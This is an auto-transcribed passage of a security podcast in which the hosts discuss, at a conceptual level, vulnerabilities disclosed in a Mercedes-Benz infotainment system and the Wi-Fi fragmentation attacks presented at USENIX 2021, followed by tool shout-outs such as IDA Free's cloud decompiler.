elsewhere. Yeah, so if you want to look specifically at the vulnerabilities and the report, those are detailed on pages, 31 to 45. So only about like 14 of the pages in the reporter actually dedicated to the vulnerabilities. A lot of the stuff afterwards is post-attack stuff you can do which if you want to do, car hacking is probably of interest to you but if you're not really in that field then you could you could probably skip those pages. The first vulnerability is an out-of-bounds read. When parsing messages do And uncheck length field when calculating the next messages address. So you can get this out of bounds memory read as a message, the second issue is an unchecked count field and the multi SV. Get message payload for retrieving SV objects. Third bug is yet another unchecked count field in the get attributes payload and the exact same message type. As the last one, the multi SV get message, the fourth bug another, uncheck count field instead of multi SV get this one. As in multi St set. So it's kind of similar to the the last issues, it's just in the set path. The final and probably most interesting issue purely by virtue of not being a trivial Heap, overflow was type confusion in the multi SV set, attributes Handler. Yeah. So most of the issues like four out of the five are kind of memorable. They they just don't check for they just don't do any validation on the like count fields that are provided Which seems a bit strange. I'm, I kind of would have expected a bit better but yeah, it's kind of your why
they that they write. So the way the count field is she's worked as they rode into that fixed size buffer, you know, an unchecked cow, I don't know. It's one of those really stupid issues that we've actually been seeing a few times in the last couple episodes is there's some counter. Things are just copying them into one by one into a fixed size buffer without checking the buffer or checking it appropriately. Oh no. It's it is such a stupid issue. And Yeah, I've made that's all I'm going to say
there. Yeah. With this report I got the impression that with the vulnerabilities that were found, there's no way that this code was like thoroughly tested her for code reviewed, like be honest, if you were doing a security assessment like an internal security assessment, should catch these issues pretty quickly. So that was a little bit concerning. I feel like I know iot has always kind of been a bit of a mean but cars, they need to be held to a bit of a higher standard. I think when it comes to They're how well-written their code is in terms of security because I mean cars are massive machines that if somebody gets enough access, I mean here some of the issues were in the infotainment system which somebody might be able to like unlock the car or something or open the doors, but the impact isn't super high, but if they can get into the control unit and get into the can bus, I mean that's a very dangerous capability for an attacker to have. It's a little bit disappointing that it's the car security is so bad,
the code and chips running like in the engine and stuff are more regulated than the infotainment unit. That's why the infotainment unit is such a common entry point. But it is working on, like, there are more regulations regarding the code standards when it comes to like the onboard chips rather than the infotainment unit and then, there are regulations regarding like the infotainment unit shouldn't, or should be far walled off from like the can boss and things like that. I'm not actually sure if that standard but there are restrictions regarding like certain architectural things. Like it's not like it's a wild west anti early. Still, I mean still the bad cold and it is worth noting. I'm not sure how practical this fart access to. This particular attack would have been because the way they got access to the heii, the haikyuu protocol was by basically soldering on to the chip and pretending to be. There's a device that they are pretending to be. I forget what? What the device was. Yeah, we remove the csb from the head unit and solder these test points with an RJ45 cable, they literally just soldered their own, like, ethernet cable on plugged it into a PC and that gave them access and set the PC up to use whatever IP the csb had. So they were pretending to be the CSV which had looser firewall restrictions, but it did require like soldering onto the
chip. But that is a limiting factor. I do feel like the physical threat model is totally valid though.
Oh yeah, jailbreaking for example, would be a thing with cars. Like it's there, too. But like as an attack like a malicious attack, it's it's definitely a lot more restrictive than say, the wireless attacks. We've seen on
Tesla. Yes. Somebody made the joke and chat earlier about a Mercedes-Benz. Jailbreak ETA 1 so to balance the scales a little bit for Mercedes-Benz I did want to call out tencent included this little letter at the bottom of her post. I don't know if you manage to like take a quick read of it at all but it was a very positive letter from Mercedes-Benz to tencent security lab basically thanking them for their efforts to disclose vulnerabilities and do it responsibly Play saying we experienced you as a valuable and Professional Security research lab. Taking this opportunity we would like to emphasize and we highly, appreciate your profound know how expertise and effort. You have put to help further secure our vehicles. We hope you accept this letter as our appreciation for your work. So I mean we've covered some issues before where vendors have taken reports very badly and that's definitely not what's happened here. Mercedes-Benz is taking these kind of in stride and Wanted to call that out. So, I thought that was a really cool letter that they included with the end.
Yeah, I need it's, it's a positive response. And as we've said, multiple times mean, I care about the response, a company has to vulnerabilities rather than the present of vulnerabilities. And I do want to, I'll shout out of chappie Hoppers. Does it run Doom? We can wish. I mean, can you imagine having doom on your self driving car or
something? I would be surprised if it hasn't already been done in all honesty. I mean Doom runs on pregnancy test, so I would like it
with. I know what you're talking about. That is, it's running because he embedded in LCD screen into the pregnancy test, like it's not running on a pregnancy
test, okay? But still like when you have the complex infotainment system and something like a Tessler Mercedes-Benz, I have no doubt in my mind. You can, you can do doom on that. And I like I said, I would be surprised if somebody hasn't already done that. So if not, you know, maybe that's a goal for someone to strive towards if you're listening. All right, we'll move into our last set of issues before we wrap up in two shutouts which was the presentation on fragmentation based attacks at use Linux security. 2021, there was also a tool released to test for these types of issues and access points. And clients. Several different attacks were detailed a combination of design. I am and implementation issues. There's a lot of different ways you can read into these attacks. There's a white paper. There's the usenix presentation you can. Look at the code for the repository, but I would really suggest that you use next presentation. I actually watched that and it was really well done in my opinion.
I mean, the nice thing about, like, conference presentations in general. Like, actually for a lot of times when we've talked about the conference presentations and papers on the podcast, I've watched the presentation. Connects like my preference rather than going through the actual paper first. They usually do a pretty good job of giving you the headlining points and what kind of matters that would affect they might skip on some of the details because a conference presentation. Unlike very an academic conference presentation. I'm like, say def con or something, they're only like 15 minutes, 10, 15 minutes. That's all they get to present their paper very limited. So they usually give you kind of the key points, not necessarily the most eloquent, Talk. So it's academics doing it now. It's like people have a kind of experiencing the presentations, but yeah, I know this one though, was good, a good presentation to watch link will be in the description.
Yeah, and I think that quick aspect of it only being like 15 minutes was what made it really digestible and made me want to watch it in the first place. Because, yeah, some of those conference presentations that are like an hour-long. They are a little bit dry to get through Sometimes. So yeah, the concise aspect is not. So like I said, a comedy design and implementation issues, they all assume that you have man-in-the-middle capability, which is a fair, a fair place to argue from sorry. I just got to be the video. These all affect WPA, 3, and WPA2 some of them has existed since WEP, which has been around since like, I think it's like 1997 or something. So some of these issues go back for decades. It's so, yeah, there's an abundance of access points and clients that can be vulnerable to at least one of the detailed attacks starting out with the design flaws. The first is in packet, aggregation where packets can get aggregated together for efficiency purposes. So instead of just sending one large packet, it'll be a packet that consists of sequential embedded, packets, with metadata attached to the front of it. And what defines whether or not a packet is an aggregated packet, It is defined by a flag that comes just after the header and the problem is that flag is not authenticated. So if you're in the middle, you can just flip that flag from false to true. And what's supposed to be an aggregated packet, you can give yourself the ability to inject arbitrary packets by faking an aggregated one.
Basically, I thought that was a really cool attack and it does depend on you being able to control the data stream of the packet. So the example they use like if if the victim requests a page off of Attacker control domain, or I think they specifically saying image, you kind of control the data there. That's going to be in that packet. And then as the attacker, you're also men in the middle. You're able to flip that flag on the actual Wi-Fi packet, or frame being sent over the, over the air. So, like the content still encrypted, you can't actually see that but you could the header isn't protected. See, I thought it was a really cool tag just to be able to inject past. It's like that, not something I've ever really considered being able to do. They use? Like the actual attack is like and icmp router advertisement so you can advertise like a new DNS server that they should use if they haven't set one specifically. I mean interesting attack there but just, I don't know, injecting packets seems like it could be a very useful primitive to have Omen definitely just like an interesting attack concept and how it comes about difficult to execute in practice. They do have some in some of the other issues they talked about, we talked about quite a few, our implementation issues that would make it easier to actually, perform this such as not requiring, that user interaction by sending special packet, to some servers that don't handle it properly. but like on a whole, you know, you need a control, the data frame, and let the fragment Flag.
Yeah, the deactivation flag. Yeah,
yeah, sorry. I'm thinking of the other one.
Yep. No worries. The second design issue is an issue when it comes to the packet, fragments specifically, when they're being cached. Mainly the fact that those cash fragments will not be cleared when a client disconnects. So if an attacker sets up a spoofed MAC address and send some malicious packets and get some sort in the cache, those can get reused later when the victim connects and that can allow for both packet. And Action and leaking packets. So it's almost like poisoning, the, the cash on the access point. Basically, I thought like the design issues in particular really cool attacks, just and how they work. The third design problem is a problem with how fragments can all be sent with different Keys when encrypting
them on the last one though with the fragment cash, like, if you want to show like that, that again, is a really cool primitive to gain where You know, you connect, you spoof some injuries into the fragment cash and then the victim connects and they end up their necks like fragmented, packable use potentially use your cash fragment, like, basically, again, it's being able to inject little bits of the packet, being able to control perfect. That's just, you know, another really cool perimeter. I mean, all of these, I think are cool Primitives even though they are somewhat academic in terms of Performing them, especially this next one which will let you get back to the
scribing Yeah. So the third problem is, how fragments can be sent with different Keys? Encrypting them since an attacker in the middle can choose which ones to pass on and which ones to just drop. They can drop fragments entirely and for whatever reason, the other end will attempt to reassemble fragments. Even if the session key gets refreshed and fragments are sent with the different keys, so you can get fragments with different session Keys, assembled together, which could potentially allow packets to be leaked. The like zi said this of the three design flaw attacks. And this one seems to be the least practical in the presentation. The researcher, even noted, this is mostly academic. I was, I was kind of thinking the same thing when he was explaining the issue is like I don't really see how this could be like, why an attacker would want to do this like what they could really gain by doing it or how they could easily. Because Kimmy,
that's the thing. I have no idea how you would use this to attack, but I love you primitive here. Like it's, it's such a cool issue. I think. I think to just be able to like play Legos with the packet, obviously, it depends on like the session key changing so that needs periodically be changed which isn't a common set off again, there's an implementation issue. Also that can make a little easier but like it's it's such a cool primitive. No idea what you're going to do with it but I love the idea of it nonetheless.
Yeah. There were also various implementation flaws. Only a few of them were covered. In the presentation, I think there are a lot less interesting than the design issues. It was mostly just silly stuff like plain text frames, being accepted in certain situations where they shouldn't be such as if the fragment is fragmented the packet is fragmented. If the frame reassembles a handshake or resembles a handshake message. The other one covered was the fact that some devices and software don't support fragmentation, but they will treat fragmented frames as full ones. So you can cause this confusion where in certain situations it. Lead to frame injection. I think they call it like openbsd and and another piece of software in the presentation. Yeah. The the implementation flaws are mostly just things that could augment taking advantage of the design flaws as far as I could tell. But yeah, like the design flaws were really awesome and how they were and how they worked. If you want to take a look at the issues more in-depth, like I said, there is a white paper as well as that tool for testing clients and access points, but I I just really recommend checking out that presentation if you don't want to check out anything else. So it was really concise really well done and it was straightforward, especially for me, like, I'm not really into not sec. I don't really do networking. But the diagrams paired with the explanations, and the presentation was just very clear. Even if you're not familiar with that kind of stuff. They're very implanting it. Yeah. And they're very upfront about the impact like we're saying with the, the issues being academic,
but Yeah, I do think some people have kind of run off like crying wolf. I guess, with this one being like a lot more substantial of an attack than it was, but the resources have been pretty fair about what they've actually got
here. Yeah definitely can't blame the researchers in this case. Like I said, there were very upfront so that was just kind of the media up to its old tricks, taking things and running away with them, so, you know, not their fault. But yeah, with that said, I think we can move into our show notes, so zi. I'll let you cover the first one and then I have a few of my own as well.
Yeah, first one is a post from Connor macivor. We actually covered one of his other post browser use after free. I think a couple episodes ago He did another post, this one, looking at a Dell driver, again, a very long post plenty of background, which I kind of appreciate with. So, I mean, he's trying to break everything down for somebody who doesn't have a background in the driver exploitation, which Can be beneficial. I mean if you're learning it's a good resource. Go give it a rate ceiling work through everything. If you're already familiar maybe it's a little bit much but I did want to at least give it a quick
shout-out. Yeah, it is quite a long post. So that's that's part of why we didn't cover it. But yeah long doesn't necessarily mean that it's just a will take a little bit to get through one of my show notes is the project zero project zero put out a project for fussing targeting hyper-v emulated devices. So they didn't really put out a post. There's not too much to talk about here which is why I mostly left it as a shout-out, but like, we love talking. Hyper-v and we do talk about buzzing quite a bit obviously. So I wanted to shout out the fact that they drop this coverage guided father and it's something you can check out if hyper-v is like, an area of interest to you.
Yeah, I mean, I don't know, I'm really interested in this because I mean hyper-v has been a Target. I've talked about diving into but haven't really gone about it yet. So I'm actually I might check this out and Play around with it a bit. I mean, I'm excited to see something targeting
hyper-v. Yeah, I don't know if project zero is planning to drop a blog post at some later point to go along with it as of yet. I haven't seen one, but if they do drop one, then then we'll cover it more in-depth. I think, the last Shadow is Ida. Free has finally dropped with the cloud decompiler for a while. Ida home was kind of the testing ground for the, the cloud-based X x86 64 decompiler. Now, it's finally landed on Ida free. Eight this actually happened. I think two weeks ago but we were a little bit late on it and I didn't include it in last week's. I am going to be doing a stream. I think zi is planning on joining me for it too. I do want to do a stream of looking into the cloud-based decompiler just to see how well it works and how viable it is. If you, you know, don't have the money to put up front for Ida Pro and you have, you know, some some moral compass I guess so. Yeah, I want to take a look at the club. The compiler. See how well it works. I've heard some not-so-great things about it, like, mainly that it's like really slow and it's kind of haphazardly thrown in there. But like I said, I want to do a stream taking a look at it myself and I think that could be fun. So we don't have an exact date nailed down for what we're going to do that. I'm thinking maybe Friday, But you can join our Discord and check out our Twitter will always announce when we're going to be doing strange like that. But I just wanted to show that out if you want to take a look at that and you have been looking for like, a decompiler solution and Deidre has not been doing it for you, then you can check out the cloud-based decompiler here first
custom. Binary ninja Cloud. That's free. Is it not? I mean, it's limited. I think to like five megabyte executables, which is a pretty big limitation, but otherwise. I mean, it's free. I believe it has the decompiler in there too. So like there is that is an option.
Yeah, like you said though, it is a bit limited. I don't believe the Ida cloud-based a compiler has that limit but I did not find Harrison sure. Yeah, we'll find out on the string.
Yeah, I don't know. I mean, like somebody in chat mention but Ida is bad. I made, I have been trying to avoid using Ida. Like I've dropped out. I don't have it installed, just sound like a more personal level but it's a tool. I mean, you can use it if you want to personally I just don't really like how it like the company's lost. A lot of good will for me so like just on a personal level I don't use it but like it's a tool and it is the standard tool for a lot of this work. So like I mean it's worth at least knowing and using a bit. So you might be in the scenario where it's your only option. I have been in that scenario before. Or I guess Qatar and the R2 for corizon. But yeah, I mean we'll be taking a look at it. I think it's still worth looking at even if I'm not a big fan of Fida. Yeah. I mean, ultimately,
it's free, right? So, there's no harm in taking a look at it, if you like it, then, that's awesome. It is kind of funny though because this to me, like, Ida home was already not worth it in any way, shape, or form. Now, it's even less worth it. Click this. I think they're making Ida free better and Ida Ida Pro is always been kind of good. If you can afford it, Ida home is just in this weird middle land where it's like, Nobody really cares about it. I would be surprised if they, if they've sold many licenses for Idaho.
I mean Idaho anxious in the wrong price range. Like that. I think has been the big thing. It's not that has features nobody wants. Its that it's a features. People want at a usually like way too high, I don't
price. Yeah, it just doesn't really know what it wants to be. But yeah, I had a free at
least. They know they're hitting the corporate pricing, just the right there. Getting it. Think they know what they're targeting. That's fair. I can't really had a home is a run
for it though.
I mean the pricing still is
maybe but you're not supposed to use it in corporate environments so that's what I mean is like it's kind of confused of what it wants to be. Anyway though, I do want to commend x-rays a little bit, they have been put Work into making Ida free better. I remember when Ida free was very bare-bones, it didn't really have anything, I don't even remember. If you could analyze 64-bit at one point and Ida free, so the fact that it can analyze both 32-bit and 64-bit and you've got an x 64 decompiler. I mean, that's pretty nice. So it's worth checking out if you're looking for a decompiler solution. So yeah and like I said we will be doing a stream on that. With that said, thanks to everyone who tuned in. And bonds are up on Twitch and YouTube as well as anchor 24 hours after the podcast. Before we head out. I'm going to quickly plug again that we do have a few discussion videos coming this week. The talk about making the transition from CTF to real-world both west of own research and exploitation. It's a bit of a mini series of three parts, and it will be released on Thursday, Friday and Saturday.
Yeah, that's something. We've been working on our wanted to get done for quite a while since we did that getting started. Thank you, spark 21 for the sub. Looks like that's two months.